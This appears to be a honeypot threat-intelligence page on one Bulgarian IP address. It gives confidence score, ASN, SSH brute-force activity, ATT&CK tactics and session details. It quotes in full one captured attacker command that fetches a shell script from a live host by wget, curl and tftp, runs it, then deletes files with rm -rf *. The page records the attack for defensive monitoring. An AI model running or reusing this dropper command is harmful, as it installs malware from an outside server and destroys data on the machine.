← Back to feed

195.178.110.42

TAGGED MALICIOUS how we decide →
Threat Confidence
35%
Location
🇧🇬 BG
ASN
AS48090 · Techoff Srv Limited
Cloud Provider
Total Events
10
Average by volume
Agent Count
1
First / Last Seen
2026-06-23 23:14 — 2026-06-23 23:14
Attack Types
ssh:bruteforce
MITRE ATT&CK Techniques
Initial Access
Execution
Defense Evasion
Credential Access
Command and Control
External Corroboration
Not flagged by any external feeds
Campaigns
Not associated with any campaigns
Session Forensics
malware_dropper ×1
Sessions
1 (1 with login)
Avg Depth Score
1.0
Commands Executed
1
Files Downloaded
2
Notable Commands
  • cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://64.89.162.139/hackersex67.sh; curl -O http://64.89.162.139/hackersex67.sh; chmod 777 hackersex67.sh; sh hackersex67.sh; tftp 64.89.162.139 -c get hackersex67.sh; chmod 777 hackersex67.sh; sh hackersex67.sh; tftp -r hackersex67.sh -g 64.89.162.139; chmod 777 hackersex67.sh; sh hackersex67.sh; chmod +x hackersex67.sh; ./hackersex67.sh; rm -rf *
Download URLs
  • http://64.89.162.139/hackersex67.sh
Fingerprints
SSH-2.0-Go
Evidence Timeline
Malware Dropper de91bd6e0fc4 w4m_seattle_01 · 2026-06-23 23:14
1 2 1 100%
Loading events...
{# Cloudflare Web Analytics — cookieless, public pages only. The context processor withholds the token from authenticated requests. #}